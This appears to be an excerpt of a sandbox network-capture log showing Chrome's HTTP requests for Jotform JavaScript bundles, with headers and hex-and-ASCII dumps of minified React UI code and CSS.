                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6c 61 74 74 65 6e 41 72 72 61 79 54 79 70 65 43 68 69 6c 64 72 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 65 2e 63 68 69 6c 64 2c 72 3d 65 2e 61 72 72 61 79 54 79 70 65 43 68 69 6c 64 72 65 6e 2c 6f 3d 65 2e 6e 65 77 43 68 69 6c 64 50 72 6f 70 73 2c 69 3d 65 2e 6e 65 73 74 65 64 43 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 20 59 28 7b 7d 2c 72 2c 28 28 74 3d 7b 7d 29 5b 6e 2e 74 79 70 65 5d 3d 5b 5d 2e 63 6f 6e 63 61 74 28 72 5b 6e 2e 74 79 70 65 5d 7c 7c 5b 5d 2c 5b 59 28 7b 7d 2c 6f 2c 74 68 69 73 2e 6d 61 70 4e 65 73 74 65 64 43 68 69 6c 64 72 65 6e 54 6f 50 72 6f 70 73 28 6e 2c 69 29 29 5d 29 2c 74 29 29 7d 2c 74 2e 70
                                                                                                                                                                                                                                            Data Ascii: r more information.")},t.prototype.flattenArrayTypeChildren=function(e){var t,n=e.child,r=e.arrayTypeChildren,o=e.newChildProps,i=e.nestedChildren;return Y({},r,((t={})[n.type]=[].concat(r[n.type]||[],[Y({},o,this.mapNestedChildrenToProps(n,i))]),t))},t.p
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 72 65 6e 28 7b 63 68 69 6c 64 3a 65 2c 6e 65 77 50 72 6f 70 73 3a 74 2c 6e 65 77 43 68 69 6c 64 50 72 6f 70 73 3a 61 2c 6e 65 73 74 65 64 43 68 69 6c 64 72 65 6e 3a 69 7d 29 7d 7d 7d 29 29 2c 74 3d 74 68 69 73 2e 6d 61 70 41 72 72 61 79 54 79 70 65 43 68 69 6c 64 72 65 6e 54 6f 50 72 6f 70 73 28 72 2c 74 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6e 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 70 72 6f 70 73 2c 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 6e 3d 42 28 65 2c 5b 22 63 68 69 6c 64 72 65 6e 22 5d 29 2c 72 3d 59 28 7b 7d 2c 6e 29 3b 72 65 74 75 72 6e 20 74 26 26 28 72 3d 74 68 69 73 2e 6d 61 70 43 68 69 6c 64 72 65 6e 54 6f 50 72 6f 70 73 28 74 2c 72 29 29 2c 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f
                                                                                                                                                                                                                                            Data Ascii: ren({child:e,newProps:t,newChildProps:a,nestedChildren:i})}}})),t=this.mapArrayTypeChildrenToProps(r,t)},t.prototype.render=function(){var e=this.props,t=e.children,n=B(e,["children"]),r=Y({},n);return t&&(r=this.mapChildrenToProps(t,r)),d.createElement(o


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            60192.168.2.1749771104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC560OUTGET /s/portal/674ac14411e/static/js/6158.c797260a.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 827005
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:22:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "c18baa1158c442ee57107e746d05174a"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 278
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6321e9b8c93-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC940INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 31 30 36 31 66 39 31 2d 62 30 61 33 2d 35 62 64 33 2d 61 65 32 31 2d 33 64 34 61 63 35
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51061f91-b0a3-5bd3-ae21-3d4ac5
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 63 65 68 6f 6c 64 65 72 5f 73 76 67 5f 5f 62 29 22 7d 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 33 37 33 2c 68 65 69 67 68 74 3a 31 36 2c 78 3a 31 32 35 2c 79 3a 35 37 2c 72 78 3a 38 2c 73 74 79 6c 65 3a 7b 66 69 6c 6c 3a 22 75 72 6c 28 23 63 61 72 64 49 74 65 6d 50 6c 61 63 65 68 6f 6c 64 65 72 5f 73 76 67 5f 5f 61 29 22 7d 7d 29 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 63 61 72 64 49 74 65 6d 50 6c 61 63 65 68 6f 6c 64 65 72 5f 73 76 67 5f 5f 63 29 22 7d 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 32 32 37 2c 68 65 69 67 68 74 3a 31 36 2c 78 3a 31 32 35 2c 79 3a 33 33 2c 72 78 3a 38
                                                                                                                                                                                                                                            Data Ascii: ceholder_svg__b)"},i.createElement("rect",{width:373,height:16,x:125,y:57,rx:8,style:{fill:"url(#cardItemPlaceholder_svg__a)"}})),i.createElement("g",{clipPath:"url(#cardItemPlaceholder_svg__c)"},i.createElement("rect",{width:227,height:16,x:125,y:33,rx:8
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 3d 61 28 22 33 32 33 35 38 22 29 2c 63 3d 61 28 22 32 37 32 31 39 22 29 2c 68 3d 61 28 22 35 39 32 30 31 22 29 2c 6d 3d 61 2e 6e 28 68 29 2c 76 3d 61 28 22 33 36 33 33 33 22 29 2c 5f 3d 61 28 22 39 35 34 37 34 22 29 2c 78 3d 61 28 22 32 32 37 32 32 22 29 2c 67 3d 61 28 22 34 35 30 35 30 22 29 3b 63 6f 6e 73 74 20 62 3d 61 28 22 31 31 37 35 39 22 29 2e 5a 50 2e 64 69 76 60 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66 79 2d 2d 6d 69 78 20 2e 74 61 67 69 66 79 5f 5f 69 6e 70 75 74 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 74 61 67 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                                                                                                            Data Ascii: =a("32358"),c=a("27219"),h=a("59201"),m=a.n(h),v=a("36333"),_=a("95474"),x=a("22722"),g=a("45050");const b=a("11759").ZP.div` div.jfTagInput .tags-input .tagify--mix .tagify__input { padding: 0; } .tags-input { tags { border: none;
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 72 67 62 28 31 30 20 32 31 20 38 31 20 2f 20 31 30 25 29 3b 0a 20 20 7d 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66 79 5f 5f 74 61 67 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 7d 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66 79 5f 5f 74 61 67 20 3e 20 64 69 76 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 63 33 33 34 35 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 7d 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66
                                                                                                                                                                                                                                            Data Ascii: color: rgb(10 21 81 / 10%); } div.jfTagInput .tags-input .tagify__tag { height: 25px; } div.jfTagInput .tags-input .tagify__tag > div { background: transparent; color: #2c3345; display: flex; } div.jfTagInput .tags-input .tagif
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6c 6c 3d 3d 3d 28 74 3d 4e 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 2e 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 52 65 66 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 75 72 72 65 6e 74 3b 61 26 26 6a 28 61 29 7d 29 2c 5b 74 2c 61 5d 29 3b 63 6f 6e 73 74 20 52 3d 28 30 2c 6c 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 28 7b 74 61 72 67 65 74 3a 65 7d 29 3d 3e 7b 6a 28 65 29 7d 29 2c 5b 61 5d 29 2c 42 3d 28 30 2c 6c 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 65 3d 3e 7b 65 2e 74 61 72 67 65 74 2e 69 6e 6e 65 72 54 65 78 74 2e 6c 65 6e 67 74 68 3e 3d 61 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 2c 5b 61 5d 29 2c 4f 3d 65 3d 3e 7b 77 69 6e 64
                                                                                                                                                                                                                                            Data Ascii: ll===(t=N.current)||void 0===t||null===(e=t.contentEditableRef)||void 0===e?void 0:e.current;a&&j(a)}),[t,a]);const R=(0,l.useCallback)((({target:e})=>{j(e)}),[a]),B=(0,l.useCallback)((e=>{e.target.innerText.length>=a&&e.preventDefault()}),[a]),O=e=>{wind
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6f 6e 4d 6f 75 73 65 44 6f 77 6e 3a 6b 2c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3a 64 2c 6f 6e 42 6c 75 72 3a 52 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 45 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 29 7d 3b 79 2e 70 72 6f 70 54 79 70 65 73 3d 7b 63 68 61 72 61 63 74 65 72 4c 69 6d 69 74 3a 64 28 29 2e 6e 75 6d 62 65 72 2c 6f 6e 43 68 61 6e 67 65 3a 64 28 29 2e 66 75 6e 63 2e 69 73 52 65 71 75 69 72 65 64 2c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3a 64 28 29 2e 62 6f 6f 6c 2c 6f 6e 46 6f 63 75 73 3a 64 28 29 2e 66 75 6e 63 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 64 28 29 2e 73 74 72 69 6e 67 2c 61 75 74 6f 46 6f 63 75 73 3a 64 28 29 2e 62 6f 6f 6c 2c 63 68 69 6c 64 72 65 6e 3a 64 28 29 2e 6f 6e 65 4f 66 54 79 70 65 28 5b 64 28 29 2e 65 6c 65 6d
                                                                                                                                                                                                                                            Data Ascii: onMouseDown:k,contentEditable:d,onBlur:R,"aria-label":E,children:t}))};y.propTypes={characterLimit:d().number,onChange:d().func.isRequired,contentEditable:d().bool,onFocus:d().func,placeholder:d().string,autoFocus:d().bool,children:d().oneOfType([d().elem
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 30 2c 68 2e 78 6d 29 28 6a 29 3b 28 30 2c 68 2e 6f 72 29 28 6a 2c 28 28 7b 6e 61 6d 65 3a 65 2c 70 61 79 6c 6f 61 64 3a 74 7d 29 3d 3e 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 61 70 70 46 6c 6f 77 52 65 61 64 79 22 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 46 20 41 70 70 73 20 69 73 20 72 65 61 64 79 2e 22 29 2c 54 7c 7c 43 7c 7c 62 28 28 30 2c 6d 2e 6b 42 55 29 28 7b 61 63 74 69 6f 6e 3a 22 66 6f 72 6d 56 69 65 77 65 64 22 2c 74 61 72 67 65 74 3a 7b 66 6f 72 6d 49 44 3a 6a 7d 7d 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 6e 69 74 41 70 70 46 6c 6f 77 22 3a 63 6f 6e 73 74 20 61 3d 66 26 26 28 30 2c 64 2e 54 76 29 28 50 29 3b 49 28 22 69 6e 69 74 4d 61 6e 61 67 65 72 22 2c 7b 75 73 65 72 3a 67 2c 66 6f 72 6d 49 73 43 6f 6d 70 6c 65 74 61 62 6c
                                                                                                                                                                                                                                            Data Ascii: 0,h.xm)(j);(0,h.or)(j,(({name:e,payload:t})=>{switch(e){case"appFlowReady":console.log("JF Apps is ready."),T||C||b((0,m.kBU)({action:"formViewed",target:{formID:j}}));break;case"initAppFlow":const a=f&&(0,d.Tv)(P);I("initManager",{user:g,formIsCompletabl
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6f 70 73 3d 7b 66 6f 72 6d 50 72 6f 70 73 3a 7b 74 69 74 6c 65 3a 22 22 7d 2c 69 6e 74 65 72 61 63 74 69 76 65 3a 21 31 2c 69 74 65 6d 49 44 3a 22 22 7d 7d 2c 37 30 36 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 61 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 6f 3d 61 28 22 39 34 36 35 33 22 29 2c 69 3d 28 61 28 22 33 37 38 39 37 22 29 2c 61 28 22 32 37 32 31 39 22 29 29 2c 6e 3d 61 28 22 34 32 35 31 35 22 29 2c 72 3d 61 28 22 34 35 30 35 30 22 29 2c 6c 3d 61 28 22 32 38 31 36 33 22 29 2c 73 3d 61 28 22 31 31 37 35 39 22 29 3b 63 6f 6e 73 74 20 64 3d 73 2e 5a 50 2e 64 69 76 60 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65
                                                                                                                                                                                                                                            Data Ascii: ops={formProps:{title:""},interactive:!1,itemID:""}},70624:function(e,t,a){a.d(t,{Z:function(){return m}});var o=a("94653"),i=(a("37897"),a("27219")),n=a("42515"),r=a("45050"),l=a("28163"),s=a("11759");const d=s.ZP.div` width: 100%; position: relative
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 29 2c 72 3d 61 28 38 31 38 38 35 29 2c 6c 3d 61 28 33 37 38 33 32 29 2c 73 3d 61 28 35 37 31 29 3b 63 6f 6e 73 74 20 64 3d 6f 2e 5a 50 2e 64 69 76 60 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 2f 2f 20 61 62 6f 75 74 20 61 70 70 48 65 61 64 65 72 42 67 20 49 6d 61 67 65 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 6e 6f 6e 65 3b 0a 20 20 24 7b 28 30 2c 72 2e 63 29 28 6e 2e 44 54 2e 41 70 70 4c 6f 67 6f 53 69
                                                                                                                                                                                                                                            Data Ascii: ),r=a(81885),l=a(37832),s=a(571);const d=o.ZP.div` display: flex; flex-direction: column; align-items: center; position: relative; // about appHeaderBg Image overflow: hidden; box-shadow: none; border-radius: none; ${(0,r.c)(n.DT.AppLogoSi
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 2e 64 7a 29 28 29 7d 3b 5c 6e 5c 6e 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 24 7b 28 30 2c 73 2e 64 7a 29 28 22 74 61 62 6c 65 74 22 29 7d 3b 5c 6e 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 24 7b 28 30 2c 73 2e 64 7a 29 28 22 74 61 62 6c 65 74 22 29 7d 3b 5c 6e 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 24 7b 28 30 2c 73 2e 64 7a 29 28 22 6d 6f 62 69 6c 65 22 29 7d 3b 5c 6e 20 20 20 20 20 20 20 20 6d 69 6e
                                                                                                                                                                                                                                            Data Ascii: .dz)()};\n\n @media screen and (max-width: 768px) {\n max-width: ${(0,s.dz)("tablet")};\n min-width: ${(0,s.dz)("tablet")};\n }\n\n @media screen and (max-width: 480px) {\n max-width: ${(0,s.dz)("mobile")};\n min


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            61192.168.2.1749773104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC560OUTGET /s/portal/674ac14411e/static/js/6354.52cd18d8.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 83118
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "5d9cc235352bd4d92c0db3a0d6dbcf45"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 278
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6321b8b0f7f-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC941INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 37 63 37 64 35 35 39 2d 34 32 65 39 2d 35 35 62 34 2d 61 64 63 32 2d 33 38 31 37 65 37
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e7c7d559-42e9-55b4-adc2-3817e7
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6d 65 6e 74 73 22 2c 5f 3d 22 66 6f 72 6d 5f 63 6f 75 6e 74 22 2c 43 3d 22 61 69 5f 61 67 65 6e 74 73 22 2c 41 3d 22 61 69 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 73 22 2c 45 3d 22 73 69 67 6e 65 64 5f 64 6f 63 75 6d 65 6e 74 73 22 2c 66 3d 22 77 6f 72 6b 66 6c 6f 77 5f 72 75 6e 73 22 2c 54 3d 22 73 75 62 6d 69 73 73 69 6f 6e 73 22 2c 4e 3d 22 75 70 6c 6f 61 64 73 22 2c 78 3d 22 76 69 65 77 73 22 2c 4f 3d 7b 5b 67 2e 54 4f 54 41 4c 5f 53 55 42 4d 49 53 53 4f 4e 53 5d 3a 68 2c 5b 67 2e 50 41 59 4d 45 4e 54 53 5d 3a 76 2c 5b 67 2e 46 4f 52 4d 53 5d 3a 5f 2c 5b 67 2e 53 49 47 4e 45 44 5f 44 4f 43 55 4d 45 4e 54 53 5d 3a 45 2c 5b 67 2e 41 49 5f 41 47 45 4e 54 53 5d 3a 43 2c 5b 67 2e 41 49 5f 43 4f 4e 56 45 52 53 41 54 49 4f 4e 53 5d 3a 41 2c 5b 67 2e 57 4f 52
                                                                                                                                                                                                                                            Data Ascii: ments",_="form_count",C="ai_agents",A="ai_conversations",E="signed_documents",f="workflow_runs",T="submissions",N="uploads",x="views",O={[g.TOTAL_SUBMISSONS]:h,[g.PAYMENTS]:v,[g.FORMS]:_,[g.SIGNED_DOCUMENTS]:E,[g.AI_AGENTS]:C,[g.AI_CONVERSATIONS]:A,[g.WOR
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 33 20 70 79 2d 32 20 62 6f 72 64 65 72 2d 62 6c 75 65 2d 36 30 30 20 62 67 2d 62 6c 75 65 2d 35 30 30 20 63 6f 6c 6f 72 2d 77 68 69 74 65 22 3a 22 70 72 69 6d 61 72 79 22 3d 3d 3d 6e 2c 22 70 78 2d 33 20 70 79 2d 32 20 62 6f 72 64 65 72 2d 62 20 62 6f 72 64 65 72 2d 6e 61 76 79 2d 32 35 20 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 77 2d 66 75 6c 6c 20 68 6f 76 65 72 3a 62 67 2d 6e 61 76 79 2d 32 35 22 3a 22 64 72 6f 70 64 6f 77 6e 22 3d 3d 3d 6e 7d 2c 69 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 29 28 22 62 75 74 74 6f 6e 22 2c 7b 6f 6e 43 6c 69 63 6b 3a 74 2c 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6f 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 7d 3b 47 2e 70 72 6f 70 54 79 70 65 73 3d 7b 63 68 69 6c 64 72 65 6e 3a 72 28
                                                                                                                                                                                                                                            Data Ascii: 3 py-2 border-blue-600 bg-blue-500 color-white":"primary"===n,"px-3 py-2 border-b border-navy-25 justify-start w-full hover:bg-navy-25":"dropdown"===n},i);return(0,s.jsx)("button",{onClick:t,type:"button",className:o,children:e})};G.propTypes={children:r(
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6f 6e 22 7d 7d 29 7d 2c 58 3d 28 7b 70 6c 61 6e 54 79 70 65 3a 65 2c 63 61 6d 70 61 69 67 6e 3a 74 2c 61 73 73 65 74 54 79 70 65 3a 6e 7d 29 3d 3e 60 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 69 6d 69 74 2d 61 73 73 65 74 73 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 62 61 6e 6e 65 72 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 24 7b 65 7d 2d 24 7b 6e 7d 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 24 7b 74 7d 60 2c 51 3d 65 3d 3e 28 28 6e 75 6c 6c 3d 3d 5a 3f 76 6f 69 64 20 30 3a 5a 5b 65 5d 29 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 65 65 3d 28 7b 75 73 65 72 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 75 73 65 72 6e 61 6d 65 3a 74 3d 22 22 2c 61 63 63 6f 75 6e 74 5f 74 79 70 65 3a 7b 6e 61 6d 65 3a 6e 3d 22 22 7d 2c 6c 69 6d 69 74 45 73 74 69 6d 61 74 69
